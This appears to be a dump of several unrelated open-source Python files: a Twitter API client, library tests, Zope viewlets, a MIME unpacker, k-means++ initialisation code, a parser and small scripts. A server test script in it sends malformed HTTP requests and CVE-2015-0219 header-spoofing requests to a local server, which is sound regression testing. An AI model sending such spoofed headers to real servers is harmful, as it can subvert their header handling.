    """Build an OAuth1 request signer for `user_id` from cached credentials."""
    consumer_key, consumer_secret = local_cache.get_server_state()['twitter_keys']
    access_token, access_secret = get_cached_access_pair(user_id)
    return OAuth1(consumer_key, consumer_secret, access_token, access_secret)
def process_tweets(tweet_list):
    """Wrap each raw tweet dict in a Tweet object, preserving order."""
    return [Tweet(raw_tweet) for raw_tweet in tweet_list]
def make_twitter_request(url, user_id, params={}, request_type='GET'):
    """ Generically make a request to twitter API using a particular user's authorization """
    # NOTE(review): any request_type other than GET/POST falls through and
    # returns None implicitly -- callers in this file only ever pass these two.
    if request_type == "GET":
        return requests.get(url, auth=get_twitter_auth(user_id), params=params)
    elif request_type == "POST":
        return requests.post(url, auth=get_twitter_auth(user_id), params=params)
def get_user_twitter_details(user_id, params={}):
    """Look up the cached user's twitter profile via users/lookup."""
    # NOTE(review): `params` (a mutable default) is mutated by the update()
    # below, so the 'user_id' key leaks across calls that omit `params`.
    url = "https://api.twitter.com/1.1/users/lookup.json"
    user_cache = local_cache.get_user_state(user_id)
    params.update({"user_id": user_cache['twitter_user_id'] })
    response = make_twitter_request(url, user_id, params)
    return response.json()


def geo_search(user_id, search_location):
    """
    Search for a location - free form
    """
    url = "https://api.twitter.com/1.1/geo/search.json"
    params = {"query" : search_location }
    response = make_twitter_request(url, user_id, params).json()
    return response


def closest_trend_search(user_id, params={}):
    """Find the trend locations closest to the coordinates in `params`."""
    #url = "https://api.twitter.com/1.1/trends/place.json"
    url = "https://api.twitter.com/1.1/trends/closest.json"
    response = make_twitter_request(url, user_id, params).json()
    return response


def list_trends(user_id, woe_id):
    """List trending topics for the given Where-On-Earth id."""
    url = "https://api.twitter.com/1.1/trends/place.json"
    params = { "id" : woe_id }
    response = make_twitter_request(url, user_id, params).json()
    return response
def read_out_tweets(processed_tweets, speech_convertor=None):
    """
    Input - list of processed 'Tweets'
    output - list of spoken responses
    """
    readouts = []
    for position, (user, text) in enumerate(processed_tweets, start=1):
        readouts.append("tweet number {num} by {user}. {text}.".format(
            num=position, user=user, text=text))
    return readouts
def request_tweet_list(url, user_id, params={}):
    """Fetch `url` on behalf of `user_id` and wrap the JSON list in Tweets.

    BUGFIX: `params` was accepted but never forwarded to the request, so
    callers like get_user_latest_tweets silently lost their query options.
    """
    return process_tweets(make_twitter_request(url, user_id, params).json())
def get_home_tweets(user_id, input_params={}):
    """Fetch the user's home timeline as Tweet objects."""
    url = "https://api.twitter.com/1.1/statuses/home_timeline.json"
    print ("Trying to get home tweets")
    response = request_tweet_list(url, user_id)
    return response


def get_retweets_of_me(user_id, input_params={}):
    """ returns recently retweeted tweets """
    url = "https://api.twitter.com/1.1/statuses/retweets_of_me.json"
    print ("trying to get retweets")
    return request_tweet_list(url, user_id)


def get_my_favourite_tweets(user_id, input_params = {}):
    """ Returns a user's favourite tweets """
    url = "https://api.twitter.com/1.1/favorites/list.json"
    return request_tweet_list(url, user_id)


def get_user_latest_tweets(user_id, params={}):
    """Fetch tweets from the user's own timeline."""
    # NOTE(review): the trailing '?' looks accidental -- requests appends the
    # query string itself. Harmless, but confirm before cleaning up.
    url = "https://api.twitter.com/1.1/statuses/user_timeline.json?"
    return request_tweet_list(url, user_id, params)


def get_latest_twitter_mentions(user_id):
    """Fetch recent tweets mentioning the user."""
    url = "https://api.twitter.com/1.1/statuses/mentions_timeline.json"
    return request_tweet_list(url, user_id)


def search_for_tweets_about(user_id, params):
    """ Search twitter API """
    url = "https://api.twitter.com/1.1/search/tweets.json"
    response = make_twitter_request(url, user_id, params)
    return process_tweets(response.json()["statuses"])
|
tests/test_random.py | hirnimeshrampuresoftware/python-tcod | 231 | 9515 | <filename>tests/test_random.py<gh_stars>100-1000
import copy
import pickle
import tcod
def test_tcod_random() -> None:
    """Exercise basic sampling methods of the CMWC generator."""
    rand = tcod.random.Random(tcod.random.COMPLEMENTARY_MULTIPLY_WITH_CARRY)
    assert 0 <= rand.randint(0, 100) <= 100
    assert 0 <= rand.uniform(0, 100) <= 100
    # NOTE(review): `guass`/`inverse_guass` appear to be tcod's own
    # (misspelled) method names, exercised here for API coverage -- confirm
    # against the tcod.random documentation before "fixing" the spelling.
    rand.guass(0, 1)
    rand.inverse_guass(0, 1)
def test_tcod_random_copy() -> None:
    """A shallow-copied Random must produce the same stream as the original."""
    source = tcod.random.Random(tcod.random.MERSENNE_TWISTER)
    duplicate = copy.copy(source)
    for _ in range(3):
        assert source.uniform(0, 1) == duplicate.uniform(0, 1)
def test_tcod_random_pickle() -> None:
    """A pickle round-trip must preserve the generator's state exactly."""
    source = tcod.random.Random(tcod.random.MERSENNE_TWISTER)
    restored = pickle.loads(pickle.dumps(source))
    for _ in range(3):
        assert source.uniform(0, 1) == restored.uniform(0, 1)
|
src/Products/Five/viewlet/viewlet.py | rbanffy/Zope | 289 | 9516 | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Viewlet.
"""
import os
import zope.viewlet.viewlet
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
class ViewletBase(zope.viewlet.viewlet.ViewletBase):
    # Zope2/Five-compatible re-export of the zope.viewlet base class.
    pass


class SimpleAttributeViewlet(zope.viewlet.viewlet.SimpleAttributeViewlet):
    # Zope2/Five-compatible re-export; behavior unchanged.
    pass


class simple(zope.viewlet.viewlet.simple):
    # We need to ensure that the proper __init__ is called.
    __init__ = ViewletBase.__init__
def SimpleViewletClass(template, bases=(), attributes=None, name=''):
    """A function that can be used to generate a viewlet from a set of
    information.
    """
    # Create the base class hierarchy; caller-supplied bases come first.
    combined_bases = bases + (simple, ViewletBase)

    members = {'index': ViewPageTemplateFile(template), '__name__': name}
    if attributes:
        members.update(attributes)

    # Generate and return a derived view class.
    return type("SimpleViewletClass from %s" % template, combined_bases, members)
class ResourceViewletBase(zope.viewlet.viewlet.ResourceViewletBase):
    # Zope2/Five-compatible re-export of the resource viewlet base class.
    pass


def JavaScriptViewlet(path):
    """Create a viewlet that can simply insert a javascript link."""
    # The class renders javascript_viewlet.pt with `_path` as the resource.
    src = os.path.join(os.path.dirname(__file__), 'javascript_viewlet.pt')
    klass = type('JavaScriptViewlet',
                 (ResourceViewletBase, ViewletBase),
                 {'index': ViewPageTemplateFile(src), '_path': path})
    return klass
class CSSResourceViewletBase(zope.viewlet.viewlet.CSSResourceViewletBase):
    """CSS resource viewlet base; inherits zope.viewlet's implementation unchanged."""
    pass
def CSSViewlet(path, media="all", rel="stylesheet"):
    """Create a viewlet that can simply insert a CSS link.

    (The docstring previously said "javascript link" — a copy/paste error;
    this factory renders ``css_viewlet.pt``.)

    Parameters:
        path: resource path exposed to the template as ``_path``.
        media: value for the stylesheet link's ``media`` attribute.
        rel: value for the stylesheet link's ``rel`` attribute.
    """
    # The template ships next to this module.
    src = os.path.join(os.path.dirname(__file__), 'css_viewlet.pt')
    klass = type('CSSViewlet',
                 (CSSResourceViewletBase, ViewletBase),
                 {'index': ViewPageTemplateFile(src),
                  '_path': path,
                  '_media': media,
                  '_rel': rel})
    return klass
|
python-3.6.0/Doc/includes/email-unpack.py | emacslisp/python | 854 | 9518 | #!/usr/bin/env python3
"""Unpack a MIME message into a directory of files."""
import os
import email
import mimetypes
from email.policy import default
from argparse import ArgumentParser
def main():
    """Unpack each non-multipart MIME part of *msgfile* into its own file.

    Files are written into the directory given by ``-d/--directory``
    (created if missing).  Parts without a usable filename are named
    ``part-NNN.<ext>`` with the extension guessed from the content type.
    """
    parser = ArgumentParser(description="""\
Unpack a MIME message into a directory of files.
""")
    parser.add_argument('-d', '--directory', required=True,
                        help="""Unpack the MIME message into the named
                        directory, which will be created if it doesn't already
                        exist.""")
    parser.add_argument('msgfile')
    args = parser.parse_args()

    with open(args.msgfile, 'rb') as fp:
        msg = email.message_from_binary_file(fp, policy=default)

    try:
        os.mkdir(args.directory)
    except FileExistsError:
        pass

    counter = 1
    for part in msg.walk():
        # multipart/* are just containers
        if part.get_content_maintype() == 'multipart':
            continue
        # Sanitize the suggested filename so a crafted message cannot write
        # outside the target directory (e.g. via "../" path components).
        filename = os.path.basename(part.get_filename() or '')
        if not filename:
            ext = mimetypes.guess_extension(part.get_content_type())
            if not ext:
                # Use a generic bag-of-bits extension
                ext = '.bin'
            filename = 'part-%03d%s' % (counter, ext)
        counter += 1
        payload = part.get_payload(decode=True)
        if payload is None:
            # e.g. message/rfc822 sub-parts decode to None; skip rather
            # than crash on fp.write(None).
            continue
        with open(os.path.join(args.directory, filename), 'wb') as fp:
            fp.write(payload)


if __name__ == '__main__':
    main()
|
tkinter_examples/draw_chess_board.py | DazEB2/SimplePyScripts | 117 | 9520 | <filename>tkinter_examples/draw_chess_board.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from tkinter import *
root = Tk()
root.title('Chess board')

canvas = Canvas(root, width=700, height=700, bg='#fff')
canvas.pack()

size = 88

for i in range(8):
    for j in range(8):
        # Squares with an even i+j are white-filled with a black outline;
        # odd squares are the inverse (same alternation as swapping the
        # colors after every cell and every column).
        is_light = (i + j) % 2 == 0
        canvas.create_rectangle(
            i * size, j * size, (i + 1) * size, (j + 1) * size,
            fill='#fff' if is_light else '#000',
            outline='#000' if is_light else '#fff',
        )

root.mainloop()
|
mars/learn/cluster/_k_means_init.py | hxri/mars | 2,413 | 9549 | <filename>mars/learn/cluster/_k_means_init.py<gh_stars>1000+
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from ... import opcodes
from ... import tensor as mt
from ...core import OutputType, recursive_tile
from ...core.operand import OperandStage
from ...serialization.serializables import KeyField, Int32Field
from ...tensor.array_utils import as_same_device, device
from ...tensor.core import TensorOrder
from ...tensor.random import RandomStateField
from ...utils import has_unknown_shape
from ..metrics import euclidean_distances
from ..operands import LearnOperand, LearnOperandMixin
def _kmeans_plus_plus_init(X,
                           x_squared_norms,
                           random_state,
                           n_clusters: int,
                           n_local_trials: int = None):
    """Build a lazy mars tensor of ``n_clusters`` k-means++ seed centers.

    Mars-tensor port of the classic k-means++ seeding loop: pick one random
    center, then repeatedly sample candidates proportionally to squared
    distance from the nearest chosen center and keep the candidate that
    lowers total potential the most.

    Parameters
    ----------
    X : mars tensor, shape (n_samples, n_features)
        Data to pick seeds from.
    x_squared_norms : mars tensor, shape (n_samples,)
        Precomputed squared Euclidean norms of the rows of ``X``.
    random_state : numpy RandomState
        Source of randomness for candidate sampling.
    n_clusters : int
        Number of seeds to choose.
    n_local_trials : int, optional
        Candidate centers sampled per iteration; defaults to
        ``2 + int(np.log(n_clusters))``.

    Returns
    -------
    mars tensor of shape (n_clusters, n_features) holding the seed centers.
    """
    n_samples, n_features = X.shape

    centers = mt.empty((n_clusters, n_features), dtype=X.dtype)

    assert x_squared_norms is not None, 'x_squared_norms None in _k_init'

    # Set the number of local seeding trials if none is given
    if n_local_trials is None:
        # This is what Arthur/Vassilvitskii tried, but did not report
        # specific results for other than mentioning in the conclusion
        # that it helped.
        n_local_trials = 2 + int(np.log(n_clusters))

    # Pick first center randomly
    center_id = random_state.randint(n_samples)
    if X.issparse():  # pragma: no cover
        centers[0] = X[center_id].todense()
    else:
        centers[0] = X[center_id]

    # Initialize list of closest distances and calculate current potential
    closest_dist_sq = euclidean_distances(
        centers[0, mt.newaxis], X, Y_norm_squared=x_squared_norms,
        squared=True)
    current_pot = closest_dist_sq.sum()

    # Pick the remaining n_clusters-1 points
    for c in range(1, n_clusters):
        # Choose center candidates by sampling with probability proportional
        # to the squared distance to the closest existing center
        rand_vals = random_state.random_sample(n_local_trials) * current_pot
        candidate_ids = mt.searchsorted(closest_dist_sq.cumsum(),
                                        rand_vals)
        # XXX: numerical imprecision can result in a candidate_id out of range
        candidate_ids = mt.clip(candidate_ids, None, closest_dist_sq.size - 1)

        # Compute distances to center candidates
        distance_to_candidates = euclidean_distances(
            X[candidate_ids], X, Y_norm_squared=x_squared_norms, squared=True)

        # update closest distances squared and potential for each candidate
        distance_to_candidates = mt.minimum(closest_dist_sq, distance_to_candidates)
        candidates_pot = distance_to_candidates.sum(axis=1)

        # Decide which candidate is the best
        best_candidate = mt.argmin(candidates_pot)
        current_pot = candidates_pot[best_candidate]
        closest_dist_sq = distance_to_candidates[best_candidate]
        best_candidate = candidate_ids[best_candidate]

        # Permanently add best center candidate found in local tries
        if X.issparse():  # pragma: no cover
            c_center = X[best_candidate].todense()
        else:
            c_center = X[best_candidate]

        centers[c] = c_center

    return centers
class KMeansPlusPlusInit(LearnOperand, LearnOperandMixin):
    """Mars learn operand computing k-means++ initial centers.

    When both inputs fit in a single chunk the operand executes directly
    via scikit-learn's k-means++ implementation; otherwise it tiles into
    the mars-tensor algorithm in ``_kmeans_plus_plus_init``.
    """
    _op_type_ = opcodes.KMEANS_PLUS_PLUS_INIT

    # Serializable operand fields.
    _x = KeyField('x')
    _n_clusters = Int32Field('n_clusters')
    _x_squared_norms = KeyField('x_squared_norms')
    _state = RandomStateField('state')
    _n_local_trials = Int32Field('n_local_trials')

    def __init__(self, x=None, n_clusters=None, x_squared_norms=None,
                 state=None, n_local_trials=None, output_types=None, **kw):
        super().__init__(_x=x, _n_clusters=n_clusters, _x_squared_norms=x_squared_norms,
                         _state=state, _n_local_trials=n_local_trials,
                         _output_types=output_types, **kw)
        if self._output_types is None:
            self._output_types = [OutputType.tensor]

    @property
    def x(self):
        return self._x

    @property
    def n_clusters(self):
        return self._n_clusters

    @property
    def x_squared_norms(self):
        return self._x_squared_norms

    @property
    def state(self):
        return self._state

    @property
    def n_local_trials(self):
        return self._n_local_trials

    def _set_inputs(self, inputs):
        # Keep field references in sync after inputs are (re)assigned:
        # x is the first input, x_squared_norms the last.
        super()._set_inputs(inputs)
        self._x = self._inputs[0]
        self._x_squared_norms = self._inputs[-1]

    def __call__(self):
        """Create the output tileable of shape (n_clusters, n_features)."""
        inputs = [self._x, self._x_squared_norms]
        kw = {
            'shape': (self._n_clusters, self._x.shape[1]),
            'dtype': self._x.dtype,
            'order': TensorOrder.C_ORDER
        }
        return self.new_tileable(inputs, kws=[kw])

    @classmethod
    def _tile_one_chunk(cls, op: "KMeansPlusPlusInit"):
        """Fast path: both inputs are single chunks, run in one chunk op."""
        out = op.outputs[0]

        chunk_op = op.copy().reset_key()
        chunk_kw = out.params.copy()
        chunk_kw['index'] = (0, 0)
        chunk_inputs = [op.x.chunks[0], op.x_squared_norms.chunks[0]]
        chunk = chunk_op.new_chunk(chunk_inputs, kws=[chunk_kw])

        kw = out.params
        kw['chunks'] = [chunk]
        kw['nsplits'] = tuple((s,) for s in out.shape)
        new_op = op.copy()
        return new_op.new_tileables(op.inputs, kws=[kw])

    @classmethod
    def tile(cls, op: "KMeansPlusPlusInit"):
        if len(op.x.chunks) == 1:
            assert len(op.x_squared_norms.chunks) == 1
            return cls._tile_one_chunk(op)
        else:
            return (yield from cls._tile_k_init(op))

    @classmethod
    def _tile_k_init(cls, op: "KMeansPlusPlusInit"):
        """Multi-chunk path: expand into the mars-tensor k-means++ graph."""
        X = op.x
        n_clusters = op.n_clusters
        x_squared_norms = op.x_squared_norms
        random_state = op.state
        n_local_trials = op.n_local_trials

        centers = _kmeans_plus_plus_init(X, x_squared_norms, random_state,
                                         n_clusters, n_local_trials)
        return (yield from recursive_tile(centers))

    @classmethod
    def execute(cls, ctx, op: "KMeansPlusPlusInit"):
        """Run scikit-learn's k-means++ on the (single-chunk) inputs."""
        # The private sklearn entry point moved/renamed across versions;
        # fall back through the known locations.
        try:
            from sklearn.cluster._kmeans import _kmeans_plusplus
        except ImportError:  # pragma: no cover
            try:
                from sklearn.cluster._kmeans import _k_init
            except ImportError:
                from sklearn.cluster.k_means_ import _k_init

            def _kmeans_plusplus(*args, **kwargs):
                return _k_init(*args, **kwargs), None

        (x, x_squared_norms), device_id, _ = as_same_device(
            [ctx[inp.key] for inp in op.inputs], device=op.device, ret_extra=True)

        with device(device_id):
            ctx[op.outputs[0].key] = _kmeans_plusplus(
                x, op.n_clusters, x_squared_norms=x_squared_norms, random_state=op.state,
                n_local_trials=op.n_local_trials)[0]
###############################################################################
# Initialization heuristic
def _k_init(X, n_clusters, x_squared_norms, random_state, n_local_trials=None):
    """Init n_clusters seeds according to k-means++.

    Parameters
    ----------
    X : array or sparse matrix, shape (n_samples, n_features)
        The data to pick seeds for. To avoid memory copy, the input data
        should be double precision (dtype=np.float64).
    n_clusters : integer
        The number of seeds to choose.
    x_squared_norms : array, shape (n_samples,)
        Squared Euclidean norm of each data point.
    random_state : int, RandomState instance
        The generator used to initialize the centers; an int makes the
        randomness deterministic.  See :term:`Glossary <random_state>`.
    n_local_trials : integer, optional
        Number of seeding trials for each center (except the first); the one
        reducing inertia most is greedily chosen.  ``None`` (the default)
        makes the number of trials depend logarithmically on the number of
        seeds (2+log(k)).

    Notes
    -----
    Selects initial cluster centers for k-means clustering in a smart way to
    speed up convergence ("k-means++: the advantages of careful seeding",
    ACM-SIAM symposium on Discrete algorithms, 2007).
    """
    init_op = KMeansPlusPlusInit(
        x=X, n_clusters=n_clusters, x_squared_norms=x_squared_norms,
        state=random_state, n_local_trials=n_local_trials)
    return init_op()
class KMeansScalablePlusPlusInit(LearnOperand, LearnOperandMixin):
    """Mars learn operand implementing scalable k-means++ (k-means||) init.

    Tiling oversamples candidate centers over ``init_iter`` rounds, then a
    map/combine/reduce chunk pipeline weights the candidates by how many
    points they are closest to and clusters them down to ``n_clusters``
    final centers with a local scikit-learn KMeans run.
    """
    _op_type_ = opcodes.KMEANS_SCALABLE_PLUS_PLUS_INIT

    # Serializable operand fields.
    _x = KeyField('x')
    _n_clusters = Int32Field('n_clusters')
    _x_squared_norms = KeyField('x_squared_norms')
    _state = RandomStateField('state')
    _init_iter = Int32Field('init_iter')
    _oversampling_factor = Int32Field('oversampling_factor')

    def __init__(self, x=None, n_clusters=None, x_squared_norms=None,
                 state=None, init_iter=None, oversampling_factor=None,
                 output_types=None, **kw):
        super().__init__(_x=x, _n_clusters=n_clusters, _x_squared_norms=x_squared_norms,
                         _state=state, _init_iter=init_iter,
                         _oversampling_factor=oversampling_factor,
                         _output_types=output_types, **kw)
        if self._output_types is None:
            self._output_types = [OutputType.tensor]

    @property
    def x(self):
        return self._x

    @property
    def n_clusters(self):
        return self._n_clusters

    @property
    def x_squared_norms(self):
        return self._x_squared_norms

    @property
    def state(self):
        return self._state

    @property
    def init_iter(self):
        return self._init_iter

    @property
    def oversampling_factor(self):
        return self._oversampling_factor

    def _set_inputs(self, inputs):
        # Map/combine/reduce stage chunks don't carry x/x_squared_norms,
        # hence the None guards.
        super()._set_inputs(inputs)
        if self._x is not None:
            self._x = self._inputs[0]
        if self._x_squared_norms is not None:
            self._x_squared_norms = self._inputs[-1]

    def __call__(self):
        """Create the output tileable of shape (n_clusters, n_features)."""
        inputs = [self._x, self._x_squared_norms]
        kw = {
            'shape': (self._n_clusters, self._x.shape[1]),
            'dtype': self._x.dtype,
            'order': TensorOrder.C_ORDER
        }
        return self.new_tileable(inputs, kws=[kw])

    @classmethod
    def tile(cls, op: "KMeansScalablePlusPlusInit"):
        """Build the oversample + map/combine/reduce chunk graph."""
        if has_unknown_shape(*op.inputs):
            yield
        x = mt.tensor(op.x)
        x_squared_norms = mt.atleast_2d(op.x_squared_norms)
        out = op.outputs[0]

        random_state = op.state
        rs = mt.random.RandomState.from_numpy(random_state)

        n_samples, n_features = x.shape
        n_clusters = op.n_clusters

        # step 1, sample a centroid
        centers = x[random_state.randint(n_samples, size=1)]

        for _ in range(op.init_iter):
            distances = euclidean_distances(
                x, centers, X_norm_squared=x_squared_norms, squared=True)

            # calculate the cost of data with respect to current centers
            cost = mt.sum(mt.min(distances, axis=1))

            # calculate the distribution to sample new centers
            distribution = mt.full(len(distances), 1 / len(distances))
            mt.true_divide(mt.min(distances, axis=1), cost,
                           where=cost != 0, out=distribution)

            # pick new centers
            new_centers_size = op.oversampling_factor * n_clusters
            new_centers = x[rs.choice(n_samples, new_centers_size, p=distribution)]

            centers = mt.concatenate([centers, new_centers])

        # rechunk centers into one chunk
        centers = (yield from recursive_tile(centers)).rechunk(centers.shape)

        distances = yield from recursive_tile(euclidean_distances(
            x, centers, X_norm_squared=x_squared_norms, squared=True))

        map_index_to_chunks = {}
        # calculate weight for each chunk
        for c in distances.chunks:
            map_chunk_op = KMeansScalablePlusPlusInit(stage=OperandStage.map)
            map_chunk_kw = {
                'shape': (len(centers),),
                'dtype': np.dtype(np.int64),
                'order': TensorOrder.C_ORDER,
                'index': c.index
            }
            map_chunk = map_chunk_op.new_chunk([c], kws=[map_chunk_kw])
            map_index_to_chunks[c.index] = map_chunk

        combine_chunks = []
        for i in range(distances.chunk_shape[0]):
            map_chunks = [map_index_to_chunks[i, j]
                          for j in range(distances.chunk_shape[1])]
            combine_chunk_op = KMeansScalablePlusPlusInit(stage=OperandStage.combine)
            combine_chunk_kw = {
                'shape': (len(centers),),
                'dtype': np.dtype(np.int64),
                'order': TensorOrder.C_ORDER,
                'index': (i,)
            }
            combine_chunk = combine_chunk_op.new_chunk(
                map_chunks, kws=[combine_chunk_kw])
            combine_chunks.append(combine_chunk)

        reduce_chunk_op = KMeansScalablePlusPlusInit(n_clusters=op.n_clusters,
                                                     state=random_state,
                                                     stage=OperandStage.reduce)
        reduce_chunk_kw = out.params
        reduce_chunk_kw['index'] = (0, 0)
        reduce_chunk = reduce_chunk_op.new_chunk([centers.chunks[0]] + combine_chunks,
                                                 kws=[reduce_chunk_kw])

        new_op = op.copy()
        kw = out.params
        kw['chunks'] = [reduce_chunk]
        kw['nsplits'] = tuple((s,) for s in out.shape)
        return new_op.new_tileables(op.inputs, kws=[kw])

    @classmethod
    def _execute_map(cls, ctx, op: "KMeansScalablePlusPlusInit"):
        """Per-chunk: closest-candidate distance and index for each sample."""
        distances = ctx[op.inputs[0].key]
        min_distance_ids = np.argmin(distances, axis=1)
        min_distances = distances[range(len(distances)), min_distance_ids]
        ctx[op.outputs[0].key] = (min_distances, min_distance_ids)

    @classmethod
    def _execute_combine(cls, ctx, op: "KMeansScalablePlusPlusInit"):
        """Merge map outputs of one row of chunks into per-candidate counts."""
        out = op.outputs[0]
        all_distances, all_min_distance_ids = tuple(zip(*(ctx[inp.key] for inp in op.inputs)))
        distances = np.stack(all_distances).T
        min_distance_ids = np.stack(all_min_distance_ids).T

        combined_min_distance_id = np.argmin(distances, axis=1)
        min_distance_ids = min_distance_ids[range(len(distances)), combined_min_distance_id]
        count = np.bincount(min_distance_ids)
        result = np.zeros(out.shape[0], dtype=np.int64)
        result[:len(count)] = count
        ctx[out.key] = result

    @classmethod
    def _execute_reduce(cls, ctx, op: "KMeansScalablePlusPlusInit"):
        """Cluster weighted candidate centers down to n_clusters with KMeans."""
        from sklearn.cluster import KMeans

        inputs = [ctx[inp.key] for inp in op.inputs]
        count = np.zeros(inputs[1].shape[0], dtype=np.int64)
        for inp in inputs[1:]:
            count += inp
        weight = count / count.sum()
        centers = inputs[0]
        kmeans = KMeans(n_clusters=op.n_clusters, n_init=1,
                        random_state=op.state)
        kmeans.fit(centers, sample_weight=weight)
        ctx[op.outputs[0].key] = kmeans.cluster_centers_

    @classmethod
    def execute(cls, ctx, op: "KMeansScalablePlusPlusInit"):
        # Dispatch on the pipeline stage assigned during tiling.
        if op.stage == OperandStage.map:
            return cls._execute_map(ctx, op)
        elif op.stage == OperandStage.combine:
            return cls._execute_combine(ctx, op)
        else:
            return cls._execute_reduce(ctx, op)
def _scalable_k_init(X, n_clusters, x_squared_norms, random_state,
                     oversampling_factor=2, init_iter=5):
    """Init n_clusters seeds with scalable k-means++ (k-means||)."""
    init_op = KMeansScalablePlusPlusInit(
        x=X, n_clusters=n_clusters, x_squared_norms=x_squared_norms,
        state=random_state, init_iter=init_iter,
        oversampling_factor=oversampling_factor)
    return init_op()
|
tests/pure-req.py | rbanffy/bjoern | 2,326 | 9577 | import sys
import socket
# Manual request driver for the test server on port 8080.  Fix: the original
# called Python 2's `raw_input`, which does not exist under Python 3 (the
# script otherwise uses Python 3 constructs: print(), bytes literals,
# str.encode()); the interactive prompt therefore crashed with NameError.
conn = socket.create_connection(('0.0.0.0', 8080))

msgs = [
    # 0 Keep-Alive, Transfer-Encoding chunked
    'GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n',

    # 1,2,3 Close, EOF "encoding"
    'GET / HTTP/1.1\r\n\r\n',
    'GET / HTTP/1.1\r\nConnection: close\r\n\r\n',
    'GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n',

    # 4 Bad Request
    'GET /%20%20% HTTP/1.1\r\n\r\n',

    # 5 Bug #14
    'GET /%20abc HTTP/1.0\r\n\r\n',

    # 6 Content-{Length, Type}
    'GET / HTTP/1.0\r\nContent-Length: 11\r\n'
    'Content-Type: text/blah\r\nContent-Fype: bla\r\n'
    'Content-Tength: bla\r\n\r\nhello world',

    # 7 POST memory leak
    'POST / HTTP/1.0\r\nContent-Length: 1000\r\n\r\n%s' % ('a'*1000),

    # 8,9 CVE-2015-0219
    'GET / HTTP/1.1\r\nFoo_Bar: bad\r\n\r\n',
    'GET / HTTP/1.1\r\nFoo-Bar: good\r\nFoo_Bar: bad\r\n\r\n'
]

# Send the message selected on the command line, then echo responses until
# the server closes the connection.
conn.send(msgs[int(sys.argv[1])].encode())

while True:
    data = conn.recv(100)
    if not data:
        break
    print(repr(data))
    if data.endswith(b'0\r\n\r\n'):
        # `input` replaces Python 2's `raw_input`.
        if input('new request? Y/n') == 'n':
            exit()
        conn.send(b'GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n')
|
Gelatin/parser/Parser.py | Etherbay/Gelatin | 107 | 9585 | <gh_stars>100-1000
# Copyright (c) 2010-2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import codecs
from simpleparse import parser
from .Newline import Newline
from .Indent import Indent
from .Dedent import Dedent
from .util import error
# Grammar definition ships next to this module and is loaded once at import.
_ebnf_file = os.path.join(os.path.dirname(__file__), 'syntax.ebnf')
with open(_ebnf_file) as _thefile:
    _ebnf = _thefile.read()
class Parser(parser.Parser):
    """SimpleParse-based parser for the Gelatin syntax, with offside-rule
    (indentation) support via prebuilt NEWLINE/INDENT/DEDENT tables."""

    def __init__(self):
        self.indent = 0
        prebuilt_tables = (
            ("NEWLINE", Newline(self).table()),
            ("INDENT", Indent(self).table()),
            ("DEDENT", Dedent(self).table()),
        )
        parser.Parser.__init__(self, _ebnf, 'root', prebuilts=prebuilt_tables)

    def parse_string(self, input, compiler):
        """Parse *input* with *compiler* and return the compiled context."""
        compiler.reset()
        _, _, consumed = parser.Parser.parse(self, input, processor=compiler)
        if consumed < len(input):
            error(input, consumed)
        if 'input' not in compiler.context.grammars:
            error(input, consumed, 'Required grammar "input" not found.')
        return compiler.context

    def parse(self, filename, compiler, encoding='utf8'):
        """Read *filename* with *encoding* and parse its contents."""
        with codecs.open(filename, 'r', encoding=encoding) as handle:
            return self.parse_string(handle.read(), compiler)
|
icons/svg2png.py | benburrill/formiko | 116 | 9589 | # -*- coding: utf-8 -*-
from gi.repository.GdkPixbuf import Pixbuf
from os import makedirs
def main():
    """Render formiko.svg to a PNG at each standard icon size."""
    for size in (16, 22, 24, 32, 48, 64, 128, 256, 512):
        # Scale the SVG to a square pixbuf of this size.
        pixbuf = Pixbuf.new_from_file_at_scale("formiko.svg", size, size, True)
        makedirs("%dx%d" % (size, size))
        pixbuf.savev("%dx%d/formiko.png" % (size, size), "png", [], [])


if __name__ == "__main__":
    main()
|
angr/engines/pcode/arch/ArchPcode_PowerPC_LE_32_QUICC.py | matthewpruett/angr | 6,132 | 9631 | ###
### This file was automatically generated
###
from archinfo.arch import register_arch, Endness, Register
from .common import ArchPcode
class ArchPcode_PowerPC_LE_32_QUICC(ArchPcode):
name = 'PowerPC:LE:32:QUICC'
pcode_arch = 'PowerPC:LE:32:QUICC'
